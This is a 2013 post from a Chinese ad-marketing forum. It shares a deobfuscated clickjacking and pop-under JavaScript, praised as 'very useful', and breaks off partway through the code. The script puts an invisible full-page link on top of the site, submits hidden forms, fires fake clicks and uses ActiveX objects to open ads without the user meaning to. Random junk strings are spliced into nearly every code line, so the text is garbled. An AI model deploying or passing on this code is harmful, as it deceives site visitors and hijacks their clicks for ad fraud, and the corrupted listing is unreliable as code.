AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

Binom
 谷歌+Bing+TT+MSN官方代理 
⚡️按条S5代理⚡️静态⚡️独享⚡️5G需要代理IP?⚡️Proxysites.ai⚡️指纹浏览器,就用AdsPower
Mediabuy⚡️玩家开户首选【鲁班跨境通-自助充值转账】FB/GG/TT❤️官方免费开户Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理开户投流-7*24h❤️人工在线【官方】❤️搜索套利买量投流开户独立站⚡️开户投放
DuoPlus专注打造跨境电商云手机E.PN 虚拟卡BINOM TRACKER 60% OFF!比Adplexity还好用的Spy工具
MediaGo+Taboola+Ob开户百度国际MediaGo⚡️让产品狂奔全球百度国际,高点击转化,快速放量百度国际MediaGo,独家原生流量
ADPLEXITY + ADVERTCN7200W全球动态不重复住宅IP代理全球虚拟卡, 支持U充值Facebook 批量上广告
尤里改 - FB 稳定投放免费黑五教程(持续更新、欢迎交流)FB 三不限源头 - 自助下户充值转款各种主页、账单户、BM户(优势)
⚡️个人户,bm户不限额,账单户一手BM分享户不限额9Proxy ⚡️ $0.04/IP, 无限带宽 IPCola原生住宅IP⚡️$2.1/条双ISP
FB二三解0.1元一个虚拟卡|PTM星际卡FB专用虚拟卡Google、Bing官方总代  联盟流量开户
FB账号资源/稳定靠谱/运行5年啦FB开户代投/三不限/白名单fb耐用号0.01一个fb账号官方合作商
FB资源,账单户,分享户,国内一手FB企业户BM户账单户源头广告位出租 
查看: 16196|回复: 17

[FACEBOOK] 国内也有牛人啊。很有用的。

[复制链接]

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

发表于 2013-12-17 15:03:03 | 显示全部楼层 |阅读模式
天星网ClickJacking点击劫持分析
; i  \0 R4 o) x# I4 Yhttp://www.21tx.com/ 天星网
0 ]% |; x8 Q; X9 s* X; C8 E我得联系联系作者 # j1 e: H( }2 d9 e
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
7 e* ~8 E  O5 _9 \6 d2 p  rhttp://www.lxting.com/script/popup/v1_min.js9 y: |0 e( e, [: z7 k. E# T  G

4 F0 e7 s- U  Q8 ~# u9 [2 I这个是锁定到底JS脚本,4 P0 M7 |/ r0 ^' E
解密后的代码
  1. (function() { % S/ _5 o; e( ^9 j1 {' L. d
  2.     var aa_url = window.ytpp_url;
    0 f0 F6 D. o6 G% b' ^  h( N0 F/ F
  3.     var ua = navigator.userAgent; + f6 u9 D/ K7 P/ }3 j' i9 S& M
  4.     var form_div = document.createElement('div');
    + z9 A: ^4 C. G! l8 y
  5.     var form_pd = 0; * D. r- J. R1 F) c- l
  6.     var browser = {
    % }" ~& N, p2 S0 r$ i
  7.         ie: /msie/i.test(ua), 4 B2 f$ v" U- h5 ?3 M$ B, _
  8.         ie6: /msie 6/i.test(ua), 3 l' B3 k. ?' {' q2 `
  9.         ie7: /msie 7/i.test(ua),
    ( H, M. }2 v7 W' r( b; J
  10.         ie8: /msie 8/i.test(ua),
    " y$ L" f) k" X. U- _& r2 Y
  11.         ie9: /msie 9/i.test(ua),
    1 q0 ?7 y8 p2 D- K" h6 n2 p
  12.         360 : /360se/i.test(ua),
    3 a2 Q0 \& h% f0 U
  13.         sogou: /;?se.+?MetaSr/i.test(ua),
    # `" I/ n$ [, t. n- i/ `
  14.         maxthon: /Maxthon/i.test(ua), 1 b$ [* a/ s5 g2 l0 R2 E5 _! _
  15.         tt: /TencentTraveler/i.test(ua),
    " u. f. f; c3 x% J; ?' r, j
  16.         ff: /firefox/i.test(ua), 7 k9 J( R* o& U5 G4 F5 V& Y9 \) Q
  17.         webkit: /AppleWebKit/i.test(ua),
    7 r% F5 m! g  n9 _
  18.         opera: /Opera/i.test(ua), 5 h% p; w0 d" A# Y5 X! O; b+ C; q
  19.         qqbrowser: /QQBrowser/i.test(ua),
    6 J6 Y+ T9 X, x6 Z* D
  20.         cr: /chrome/i.test(ua), 7 z# ?  L& w9 i2 W, x
  21.         gg: window.chrome, ) p- S9 d% v4 J& A2 P/ W
  22.         theworld: /Theworld/i.test(ua) 7 |5 j, J) U4 Y# q7 z, A" ^/ Z
  23.     }; " q& X# V' k* E1 x+ q$ O$ T
  24.     var _setting = ""; 5 N. Q6 F% ?% f
  25.     var _ct = 0;
    ' N# J, u) w: \% {" |+ F
  26.     var _le = 0;
    ; g7 o; c! ^7 L& c8 c
  27.     var _pd = 1; : V) A" E5 W5 O
  28.     var _pd2 = 0;
    , R" {; i, T1 Q
  29.     var _pc = 1; & N! v- u$ R; h* ~  N) q8 c
  30.     var _pc2 = 1; 8 F. l$ g/ u- I) W9 s% z# t: ?9 z
  31.     var _pco = 0; 5 Z6 y9 Q. T2 V. b- `% l
  32.     var _pta = 0; " k8 E4 C. m3 o3 {! u+ P. n
  33.     var _ptb = 0; / P$ g8 a' P$ X, D7 q9 R1 E0 t/ y
  34.     var _pt2a = 0;
    5 a# @) J# h3 W) r  t8 X
  35.     var _pt2b = 0; ( N! Y4 b: n! w/ E# V7 ^9 v
  36.     var _pt3a = 0; - a5 F; X  q) g1 N, L5 U
  37.     var _pt3b = 0; 7 S! l# W2 B& \% a
  38.     var _pt4a = 0; " R& j! m8 L% F# O* m; A
  39.     var _pt4b = 0; 0 C" [" E2 R* D; n* `3 ~1 M
  40.     var _pt5a = 0;
    % w9 j' s2 o' P; y* Y8 i) \
  41.     var _pt5b = 0; + e2 p5 g+ [! j2 `3 N- S, N8 x9 e
  42.     var _pt6a = 0; 9 ~" B) i6 N( z' M
  43.     var _pt6b = 0; ) j. N; Z& ?* o8 I7 m, r( I
  44.     var _pt7a = 0;
    / c* d1 s5 a; M3 O
  45.     var _pt7b = 0;
    2 I+ E) P1 P$ _8 _
  46.     var _pt8a = 0;
    / N  U$ o3 b5 d3 `
  47.     var _pt8b = 0; ; a) O6 G6 x/ K8 q
  48.     var _pt9a = 0;
    , z9 @4 _0 ^, _$ H6 c! M
  49.     var _pt9b = 0;
    / J2 E% P' ~7 L7 S" g' H5 j: H
  50.     var _pt10a = 0;
    ( \( r. w" C3 _6 W( p! l
  51.     var _pt10b = 0;
    1 _1 B' `. \4 D4 U2 v# c
  52.     var _po = 0; 8 H: s4 G$ V0 E! }* [9 X% w8 z
  53.     var _poo = 0;
    # j8 ^+ b& L/ ^! Z4 j* k
  54.     var ckn, ckt;
    & \' H1 l5 D% i5 k
  55.     var ads = 0; 9 x: [- ^. Z' B/ V: o7 X  ^
  56.     function b(w) {
    . H6 [% p) A! H: h2 _9 v$ k
  57.         var s = w + "=";   x& O% M; e$ R+ e6 V) M- `
  58.         var r = "";
    4 i; T8 f3 s) ]- q5 F8 f2 \$ |
  59.         var o = 0;
    3 m% ?/ R) C% n# ~% l6 d" T1 e  ]
  60.         var d = 0;
    ! L! }: f5 O. o+ u: n$ w% H7 `
  61.         var p = document.cookie;
    2 {* j2 x- ^- I  O! k$ F
  62.         if (document.cookie.length > 0) {
    ' L1 B9 }: T/ N
  63.             o = document.cookie.indexOf(s);
      H1 ~* b6 z3 ~9 Z
  64.             if (o != -1) {
    # F) m+ W4 v, q
  65.                 o += s.length; 3 f# B% i3 X) W) J5 }8 \8 `
  66.                 d = document.cookie.indexOf(";", o); 1 A3 y; F+ I" G% F9 q
  67.                 if (d == -1) d = document.cookie.length; - @# L% A4 c0 T  P$ e
  68.                 r = unescape(document.cookie.substring(o, d))
    $ Y, K" M& c! J# a& z) x. y0 q
  69.             } & E$ e, ^& K! _1 S- u% ~9 F; T$ O9 M
  70.         }   \" ?% a6 \( |8 F) ?+ D
  71.         return r
    4 t" c, h$ A- X
  72.     }; / T7 m- `. R; s0 F9 {
  73.     function p(w, p, v) {
    * a# F& c0 G' K% O7 \( B! D+ s
  74.         var t = 30;
    - Y& j; H* P6 k) H( H
  75.         try { 5 v  L$ O! v4 r/ k$ ^
  76.             t = parseFloat(p) * 1
    ' l% t' J: `( }0 u: N
  77.         } catch(e) {
    6 |1 }; V2 Z( P- I) u/ b
  78.             t = 30
    " t" @/ K/ Y* |' ]
  79.         }   w9 E0 l, c% l9 c# l$ p$ T
  80.         if (isNaN(t)) t = 30;
    % S6 i+ d3 T' |
  81.         var then = new Date();
    / d4 P( Q" k! u! t
  82.         then.setTime(then.getTime() + t * 60 * 1000);
    " k' ]! G. V9 l1 }2 }
  83.         document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
    : k2 x5 H# ?# ~& k$ N0 ]) o* P
  84.     };
    8 h* w3 a% M: N4 }, m, q! m
  85.     function init() { ' l1 B3 b, ?) R% X
  86.         _setting = ytpp_sti;
    8 t; O& I0 A- h- R1 f- ~
  87.         if (getp(_setting, "CT")) {
    6 ]+ v! ~' P5 a. F" W6 y$ m
  88.             _ct = getp(_setting, "CT") % P' U8 b' f; r5 _7 s
  89.         } 2 O2 [% r8 j# c% S
  90.         if (getp(_setting, "LE")) {
    ; {' j9 w; D2 Y
  91.             _le = getp(_setting, "LE")   Q, ]3 X9 l# f$ \( u
  92.         } 3 ]5 O2 Q% x4 V* [& l* Q8 R& t3 U
  93.         if (getp(_setting, "PD2")) {
    * f2 t' g5 T# J4 I) U& k
  94.             _pd2 = getp(_setting, "PD2") ' V' j  X( A, H0 K
  95.         }
    4 \" o3 j) M/ X: z  m
  96.         if (getp(_setting, "PC2")) { ! X* V) b, v& T" E
  97.             _pc2 = getp(_setting, "PC2") 6 ^! O# g4 I+ a) L
  98.         }
      Z, i7 g1 W2 O4 S" X
  99.         if (getp(_setting, "PCO")) { $ `2 k4 Z; ?" F, ~5 f2 c
  100.             _pco = getp(_setting, "PCO")
    # q( t6 G# Z7 P" ]* B" x+ Y" P
  101.         } , T! A9 m8 _, R' U
  102.         for (var i = 1; i <= 10; i++) { 2 Z* `% I( d7 A: ~0 W* \7 O! N
  103.             var n = i == 1 ? "": i; 7 i# v5 z6 b- |. k) D
  104.             if (getp(_setting, "PT" + n)) { - L1 |# _  I+ [. X: n2 Y5 r
  105.                 eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); : z" C6 g" ^+ b* d8 t3 ^
  106.                 eval("_pt" + n + "a = _pt" + n + "[0];");
    " i' {6 {( G* F( P: |
  107.                 eval("_pt" + n + "b = _pt" + n + "[1];") : h3 u+ C2 }6 H' C, X' W
  108.             } : B& p6 D1 c& `* J5 @
  109.         }
    5 G/ K6 Y) s' ~$ p
  110.         if (getp(_setting, "PO")) { 7 D2 R! f( w$ @. X$ [, m
  111.             _po = getp(_setting, "PO") / n' Z( N6 _4 z0 q
  112.         }
      Q6 w( e3 b. Y& f' @% `6 t) s
  113.         if (getp(_setting, "POO")) {
    ' a/ \/ L6 J& }
  114.             _poo = getp(_setting, "POO")
      e. b9 i6 y5 L. o) p
  115.         }
    $ f' a7 E0 a1 F0 |- t3 m9 d
  116.         if (_pco == 1 || _poo == 1) { 4 F5 [* o9 U5 X; X
  117.             if (_poo == 1) {
    . Y" m/ U! t; G5 d/ D  {' g
  118.                 _pco = 0
    " H+ N4 p, x5 }: O/ R( G8 ^0 K9 Y
  119.             } else { # d6 u$ s: X+ d- L0 [- o
  120.                 _poo = 0
    0 s5 z+ H) J% a2 X/ y$ y
  121.             }
    9 \: V; u5 s- t) ?9 U
  122.             _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
    0 O  F0 D* v% V( o. h5 r- J
  123.             for (var i = 2; i <= 10; i++) {
    1 X) S, }1 O8 ]* {$ o. z0 _: I
  124.                 eval("_pt" + i + "a = _pt" + i + "b = 0;") " u% Q. W( x) ~( B
  125.             } 2 V; ]1 j: A7 u+ `& m$ g4 `1 H
  126.         }
    9 b1 s' M2 M2 |
  127.     }; " k8 Y9 Q8 m, A' M0 h! I4 l
  128.     function getp(s, p) { - ^6 g  |! q6 p
  129.         var i = s.indexOf(p + ":"); . W& O0 C6 g7 [7 |3 {
  130.         if (i >= 0) { , j( M$ d8 @3 p, f. W
  131.             return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) ( p) ~4 U0 b1 s. P6 H& R$ s
  132.         } / L" V  D, [" @3 k  `4 X. e: L# E3 i7 M
  133.     };
    4 A8 C) w) k6 I* @3 R$ P4 g8 s
  134.     function event(e, event, func, act) { 7 J. ?, u5 N7 a
  135.         if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
    - E) S3 i* V, |4 [+ ~
  136.         else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) . l( Q2 `' J+ e3 J4 v$ {; }6 v/ s/ P
  137.     }
    " D7 A! c: y3 S: Q
  138.     function pop(url, param) { ! y6 k  B& S; U' P
  139.         if (!document.body) {
    7 {. ^- s( L  f& p* |  ~
  140.             return setTimeout(function() { ) M$ X! l  [7 M7 q2 O
  141.                 pop(url, param)
    & |. O& N! g5 }2 M0 ^  i
  142.             },
    6 ^/ u6 I0 t* v, A- Z" a- ~6 v
  143.             13)
    0 `2 [  J& H- K4 B* Z& F$ t
  144.         }
    6 L6 n' G" j4 O6 y1 e
  145.         try {
    - W! k0 x* z( E6 J
  146.             if (browser['cr'] && browser['gg']) { , w" m) J& L! S3 C& H( a
  147.                 try { 8 Z  I1 z9 [" A7 t
  148.                     hrefopen(url)
    9 {$ p# t+ X* g, h; ]
  149.                 } catch(e) { / U- @/ v8 ?) B4 @  s8 [
  150.                     a_pop(url)
    / i7 W( b: o; s% O- S* F0 o
  151.                 } 6 l( K8 l! G' x( r* d
  152.             } else if (browser['webkit'] && browser['maxthon']) {
    2 k3 m- Y' g& C( {6 G7 a
  153.                 if (!func(url)) { * `% Q1 ^7 M5 j$ V0 Y
  154.                     try { % D2 h% N! S; n6 M
  155.                         form_pop(url);
    : @0 Q! e# P+ R+ B: i- O- N( |9 F
  156.                         a_pop(url)
    7 C* r5 A) U$ w2 `% k5 V
  157.                     } catch(e) {}
    % ]; y$ Q( C# `5 s. M! }% v8 v
  158.                 } 5 y, w7 V. d8 K( c
  159.             } else if (browser['tt']) { 3 Z) G+ y0 E" e) e6 d1 a
  160.                 try { * W. P, ]0 `+ W0 |
  161.                     object_pop(url) 9 e: P) x& E% J
  162.                 } catch(e) { . ]; R+ F4 b/ z+ |5 A: g
  163.                     a_pop(url) 0 T2 j8 j+ h1 o- F  h8 c. T
  164.                 }
    + d# y6 a8 Q2 G. O, P
  165.             } else if (browser['sogou']) {
    9 \, J, ?' W1 \7 H# j/ [
  166.                 if (!func(url)) {
    * V  V- w$ x5 ^! X4 K
  167.                     try {
    - Z- O; H8 j1 K$ T/ u
  168.                         a_pop(url)
    $ k# q/ @$ W: m6 k
  169.                     } catch(e) {} * V& _+ j6 Z- a  q% {5 \+ i% p, w
  170.                 } & |0 @4 a7 V" S" X1 m' Q$ ^  P
  171.             } else if (browser['webkit'] && browser['qqbrowser']) {
    8 m4 X4 p. x% b' w* ?
  172.                 if (!func(url)) {
    : d) u# s  {8 }' o: A$ x" x
  173.                     try { . x/ @$ n; @( e1 x7 x7 M8 G
  174.                         form_pop(url)
    ) ]8 h; p; v' ^: E# S
  175.                     } catch(e) { 8 E* K( H( l. U
  176.                         click_pop(url)
    ; b, A9 j* Z  s+ x( L+ W
  177.                     }
    ) B1 B2 |2 e6 ?* V
  178.                 }
    1 s3 P+ @2 D! Q: o+ \
  179.             } else if (browser['webkit'] || browser['opera']) {
    # m! w5 u* _0 U2 n# s: {+ b
  180.                 try {
    + H* M4 {$ v3 }  C2 a. l+ ?0 ]
  181.                     form_pop(url);
    ( J- _0 W! P* k; S* p; Y! {1 D" p! R( `8 j
  182.                     a_pop(url) ; P1 g5 z- z6 R0 J. D2 G  N, `7 L( ^
  183.                 } catch(e) {} : j+ i; P# n7 _" w' Z+ e+ M
  184.             } else if (browser['theworld'] && browser.ie6) {
    * Q# o% e" u' w# h$ H
  185.                 if (!object_pop2(url)) { 7 _% @& Y, |/ U5 C# e
  186.                     a_pop(url)
    4 k, j  j# L, O
  187.                 }
    5 z7 V3 g0 @# s! g
  188.             } else if (browser['theworld'] && browser.ie8) {
    $ u) \/ n% M9 ^* ^1 }( q
  189.                 if (!func(url)) {
    ( ^5 X8 N; g( m/ w2 V
  190.                     try { 2 h6 O+ d. c2 S: h2 W
  191.                         object_pop(url)
    9 g2 Y5 k9 ~1 A5 R/ ]7 B
  192.                     } catch(e) { 0 U  r5 o5 e5 o( N% B
  193.                         click_pop(url)
    1 J+ L3 G+ N" j( L- o' D
  194.                     } % ^) I% @0 S0 [1 C. u6 @
  195.                 } % ^3 z0 j5 I/ O. M8 y
  196.             } else if (browser.ie6) {
    8 X4 K. Y" r4 j% l6 e4 N
  197.                 if (!func(url)) {
    7 J* m( X/ D6 A+ g
  198.                     object_pop2(url) : X% B6 H+ r" Y% z5 M
  199.                 } + {$ y1 ]. F) g: e' a
  200.             } else if (browser.ie8) {
    : @: q& ^: j3 l  N
  201.                 if (!func(url)) {
    6 Q1 v, I9 }, l( m6 w. x
  202.                     try {
    : s$ g) z3 {: b3 N
  203.                         object_pop(url)
    - X  ^3 O2 _  J/ \# u6 y
  204.                     } catch(e) {
    ( g8 N8 l; g8 t# c9 T: ?! Y: K
  205.                         document.onclick = function() {
    0 |+ D" y% b$ o' `% f' c: M
  206.                             func(url);   E7 v# }( q/ j' e1 m, n; R9 }6 Y
  207.                             document.onclick = null
    9 q6 G$ n% _( ]" F* `
  208.                         }
    6 {) ?. D8 Z1 _$ {/ r
  209.                     } 2 Y# \6 A0 Z. l/ Y# S
  210.                 }
      R% m% e. {" d$ C2 ^. E! O
  211.             } else if (browser['ie']) {
    ; g4 ~" t% l* G: \& q  X, ]
  212.                 try {
    $ v2 ]$ [: s' R5 C2 k
  213.                     object_pop(url)
    ; z: M3 V% k: e) L. ?
  214.                 } catch(e) { 3 H! L& P; d) i2 {; l' N
  215.                     click_pop(url)
    0 b( G  ?3 o+ u, r* k0 K$ ?- D
  216.                 }   e* X+ p! m  {  v! g
  217.             } else if (browser['ff']) { & i7 n1 W7 Q9 e0 G4 z  o5 d
  218.                 if (!func(url)) { # K( @8 J* j8 e& h; N1 f6 C; E
  219.                     click_pop(url)
    ' {; o4 s( u; Q4 `0 S0 ?& V4 q4 i
  220.                 } & Q/ r- _3 n2 z& o/ l
  221.             } else {
    ! u% |4 @+ R' C4 r& f
  222.                 if (!func(url)) {
    ( J5 j7 L1 H* J8 r
  223.                     click_pop(url)
    / G0 q7 c. d" [: _! F
  224.                 }
    # D& }3 u6 L2 L& E4 o
  225.             } ( B- {1 l# `) y
  226.         } catch(e) { * u0 }! R/ l8 A  n  ^3 e
  227.             if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
    / E  q' @- `" L, G' `6 R
  228.                 click_pop(url)
    - y8 a9 Z( m  K4 a. G- C
  229.             } else { $ c$ P( ?0 S1 B7 j. y& B/ S
  230.                 a_pop(url)
    # u% I, {! h. C9 T6 D
  231.             } % s( Z. m7 j" o' B" P6 y
  232.         }
    6 x/ x- b% A6 \
  233.     } ' g, v- }) ~% p$ K* y$ S" k
  234.     function object_pop(url, param) {
    4 |* b6 }( D, V& }2 n0 G! A1 Z3 F
  235.         var object = document.createElement('object');
    # A; C9 P3 p/ E1 S. c
  236.         object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); ( d/ e( s  R6 F% Q/ h0 g
  237.         object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 9 |; D/ \4 e/ k- h3 g$ o; x$ `
  238.         append(object);
    1 X: O! _# G' F
  239.         object.launchURL(url); % f( S! W/ y2 ~7 V5 O% x
  240.         ads++; ; Z/ D# o1 p+ c1 ?9 r7 O+ Y
  241.         p(ckn, ckt, ads)
    $ j3 y1 Q; F7 }* h' b/ @  v, f
  242.     }
    & h9 m1 |. q+ `* U5 t8 ?- l8 w
  243.     function object_pop2(url, param) {
    7 l. P2 i0 U1 A$ B
  244.         var object2 = document.createElement('object');   o7 r: N1 b, o3 R2 D1 v4 ]
  245.         object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); ) A) [" M' e9 l# M; i8 k
  246.         object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; % x5 M+ \" y+ K) ?
  247.         append(object2); ' m% b7 w+ r- W0 ?2 X$ w  h, D; _+ ^2 U
  248.         for (var i in object2) {
    4 u- k; Q0 J4 r" p# @+ @
  249.             try { (function(o) {})(object2[i]) 7 J, t% U5 \! A' X! X1 K: O
  250.             } catch(e) {} 9 S1 @' z5 W6 I, o# m0 {
  251.         }
    2 g6 W/ m* Y% o$ _* g, z
  252.         setTimeout(function() { 3 e& X+ M9 J8 h8 x0 R4 E6 W
  253.             object2.DOM.Script.open(url, '_blank', '') 0 A" R* D( e9 a9 r7 g
  254.         },
    9 ]3 `+ [) e) ]
  255.         500);
    2 K% n7 R# V, w
  256.         ads++; ! q1 T$ v3 ^/ m
  257.         p(ckn, ckt, ads)
    ; H. D7 r$ J  y+ v) {
  258.     }
    1 M3 ?* L3 l0 V, F! u
  259.     function append(e) {
    4 {' B/ V; t( O/ y- D1 b, ?6 A. l$ _
  260.         for (var t in {
    # u1 p' R( V; Z1 f7 E
  261.             body: 1 + H5 g* u% C7 c; A& z' ?
  262.         }) { ( I$ O; @4 j) c# J* Q$ h
  263.             var ele = document.getElementsByTagName(t); # P& \$ c" y; d: t( O6 E% t# ^
  264.             for (var i = 0; i < ele.length; i++) {
    ( v; B* D+ s9 j
  265.                 ele[i].insertBefore(e, ele[i].firstChild);
    7 d% a$ Q/ Z- U$ _) ?
  266.                 return6 S$ [' ]. C- P/ l4 p8 R
  267.             } ( [( n' N+ a- V% Z
  268.         } 7 u$ E; \8 W4 @/ A, s& F! m+ v
  269.     }   K; d+ }& t% h: F2 U' A! r
  270.     function hrefopen(url) { 0 q0 z$ R; g9 A8 z
  271.         try {
    + W! F4 L# Z  u
  272.             var c = document.createElement("a"); - |' V& ^, P+ V; ?/ ~& Q) l
  273.             c.setAttribute("href", url); 9 W; k2 y. w4 ?0 u
  274.             c.setAttribute("target", "_blank"); 1 o8 }; \- u  v* x/ O
  275.             c.setAttribute("style", "display:none;");
    % P: l: K" F9 }( k' U
  276.             var b = document.createEvent("MouseEvents"); * H- @8 i5 d7 v* }
  277.             b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
    5 z& X  ]# J2 Y' x; \8 H1 C  h/ f
  278.             c.dispatchEvent(b);
    1 T# f/ Y. |* E  O2 l" |: ^+ j
  279.             ads++; $ R/ Q/ P# [$ S$ b0 u; b
  280.             p(ckn, ckt, ads); ' u* w  X9 h- k) x
  281.             return true' {% ]! N  f6 `( P8 A" r; `
  282.         } catch(q) { , P8 ]; k1 \3 l' \" x! D0 J
  283.             return false
    $ h9 l/ p' W4 q* A
  284.         } 3 {* L' a/ @& U* D
  285.     }
    ; J- c4 N# i! N1 J3 {
  286.     function form_pop(url) {
    ) l8 b5 K# j" C
  287.         form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 7 x0 y/ R6 c* Q
  288.         form_div.setAttribute('style', 'display:none'); * v# {1 ]2 ?3 ~' B. K* K. m0 @
  289.         var form = document.createElement('form');
    . {, }; t4 F9 _; _
  290.         form.setAttribute('action', aa_url);
    , a5 v5 B# E: b+ H0 J8 _
  291.         form.setAttribute('method', 'post');
    6 t) b1 i0 w8 J- f: g/ f
  292.         form.setAttribute('name', '__unionsky_push_d_form_box__');
    9 S) D9 @( r5 w- j
  293.         form.setAttribute('target', '_blank'); ' q( y% L) `9 n  V: J! E
  294.         form.setAttribute('style', 'display:none');
    : K  \2 p, A$ y4 ?: W/ T; f
  295.         var sinput = document.createElement('input'); ! {' `$ e% B1 w' ^3 {& K' q
  296.         sinput.setAttribute('style', 'display:none'); & b" l! \6 j. G
  297.         sinput.setAttribute('type', 'submit');
    0 O5 [" z1 i! N) O" q; l" k2 |% [. l
  298.         sinput.setAttribute('id', '_sumit_2app');
    3 E! z1 B! T* O$ h4 ^% _& {0 \
  299.         form.appendChild(sinput); ; d1 k! R1 I, R/ k
  300.         form_div.appendChild(form); . M1 O9 J* m) d5 |5 Z6 q6 }& a: s
  301.         append(form_div); 1 O  D- R/ N& h2 g+ v1 }4 t
  302.         var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; / l- D* X. s+ @4 d2 N' d
  303.         try { ; r! P1 }! H$ I0 W0 W
  304.             document.getElementById("_sumit_2app").click() ' F  j$ l* V/ W' n$ e
  305.         } catch(e) {
    : C: Y2 z! Y& ~# P6 z) V0 d
  306.             event(document, 'keyup',
    : z& f5 \5 F5 ~7 H. F
  307.             function(e) {
    % Q0 z  o* T2 t6 h% R4 W
  308.                 if (document.getElementById('__unionsky_push_d_object_box__') == null) {
    * b& h4 J) f/ n
  309.                     return2 \# B* A3 U3 Q
  310.                 };
    4 o2 P5 s# f  Q: f6 i
  311.                 e = e || window.event;
    2 t8 L1 L2 h+ N7 u& m4 o
  312.                 e.canceBubble = true; % d- z7 \3 t" M# J" D
  313.                 event(document, 'keyup', arguments.callee, true); : T/ ~1 h7 Y& A4 \! A  f: t+ V
  314.                 form_pd = 1; * L& C2 J. Q% O5 _! }0 d8 h
  315.                 unionsky_from.submit() 2 d# E" [  i% F( r; o* n" v
  316.             }) / Q5 Z1 |3 n& ]; @, Y
  317.         }
    3 c2 o( u! o7 M6 L% j# z. J
  318.     }; & m2 }5 _- H$ V+ P
  319.     function click_pop(url, param) {   ]9 j. k( y' Y3 h( J3 K+ ?/ A; c
  320.         event(document, 'mouseup', " @* h2 Z- o9 Y8 o+ T
  321.         function(e) {
    + X5 u# [$ m: S! Q+ F7 M
  322.             e = e || window.event;
    8 G) N4 Y9 b0 i' V3 F
  323.             e.canceBubble = true;
    * T7 J! H( N: y7 k/ S1 X
  324.             event(document, 'mouseup', arguments.callee, true); 9 r! A  L. m* K4 }# H
  325.             func(url, param); ) D) I. h  |1 I( X# d
  326.             ads++;
    ! f- T' Z) H8 d3 w8 O7 F8 O
  327.             p(ckn, ckt, ads) ! L6 s/ b# r4 X( {) K2 ?- x
  328.         })
    : p) C+ f  M- q6 m$ m
  329.     };
    5 u2 ^, h/ V3 i, f" G# P" I
  330.     function a_pop(url) {
    8 m( @% y, c7 N* j& R8 \
  331.         if (ytpp_plid == 166028) { : O, T, B3 q' u- Z! a4 R. }% b
  332.             return
    4 T1 _5 U, }  ~4 E: d
  333.         }   a# w  E" V' P1 Z1 c4 U& o
  334.         if (!document.body) { : x" F6 F( M- t& I$ z
  335.             return setTimeout(function() { 8 m/ m8 `; C4 J0 U# ?
  336.                 a_pop(url)
    0 o: l6 c$ }% A2 q
  337.             }, ! j! `+ J  g* c: B) w. i
  338.             13)
    6 y0 X- c+ U5 b8 _4 j/ i& e
  339.         } ( `% H/ O7 }% R# O# o  ~3 T# R
  340.         var a = document.createElement("a"); : f. g/ C) P* {1 N5 u
  341.         a.href = url;
    + c$ t6 h9 O. M/ m
  342.         a.target = "_blank";
    : V: f1 R: t" p) h8 b; {  o
  343.         var div = document.createElement('div'); " D) b: q( T  u5 E, k/ V% X* N% j% W1 ?
  344.         div.style.backgroundColor = '#fff'; & R5 Q$ t) C" y$ Z% x4 x3 j
  345.         a.appendChild(div); 3 ?; Z) \4 W6 k  J4 z6 Z9 {8 M
  346.         append(a); 5 f. x; s, K' V9 N
  347.         var as = a.style;
    5 X; I6 M6 }8 p' ~) ^- p# C2 \
  348.         as.position = "absolute";
    / k. R  x' I. [2 M1 ^1 V/ z( `7 A
  349.         as.zIndex = '2147483647';
    ( E: k8 l* {$ T1 Y% a& B/ c4 C
  350.         as.display = "block";
    / b. J) Q( c) I- h" r6 Z% d4 V
  351.         as.top = "0px"; - c2 i) O. K: `, H# P
  352.         as.left = "0px";
    6 R4 }4 d3 m" h/ }1 e3 J8 ]" w
  353.         as.cursor = 'default'; ! L5 f' C  ^2 Q; M4 ^4 g
  354.         as.opacity = "0";
    $ |% F, g8 i0 }4 z, s
  355.         as.filter = "alpha(opacity:0)"; ) W3 R1 Q* J( D* D
  356.         var m = setInterval(function() {
    1 @" _2 r; K1 x
  357.             if (form_pd == 1) {
    , _2 T! s" J: K$ a' K6 R
  358.                 a.parentNode.removeChild(a); , A6 z8 y0 v- v* }4 A
  359.                 clearInterval(m);
    ' ~5 {2 E! Y  s$ J# X
  360.                 return9 [* }9 z1 R1 b8 U
  361.             } $ H8 `$ Z% X4 w; c1 Y) ]
  362.             a.style.zIndex = '2147483647';
    6 s  q* S9 A9 i
  363.             var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
    8 u- J0 X* |1 H' A" Z7 l+ k1 t" e2 t
  364.             a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; / q6 O8 \! O5 W" [2 R
  365.             div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
    ( i- n+ \6 ^0 ^1 D( N
  366.             div.style.height = d.clientHeight + 'px';
    - t- ~3 f. B% E
  367.             if (browser['ie']) {
    + Z2 x( v0 \' N. H* m5 K5 j) t
  368.                 try { & S3 }6 L# [7 y( K6 x
  369.                     var divs = document.body.childNodes;
    7 o4 a8 a% I8 t4 U" n* v
  370.                     for (var i = 0; i < divs.length; i++) {
    7 M7 D) ]2 I; `* k7 t7 e! j
  371.                         if (!divs[i]['style']) { / y$ z& t/ i. w! B0 c  A
  372.                             continue8 [, ?9 ~; v3 s- K, k3 P
  373.                         } ) q# ?+ [8 m) A; s8 W& Z
  374.                         var _i = parseInt(divs[i].style.zIndex);   ]0 ~6 F, s/ W
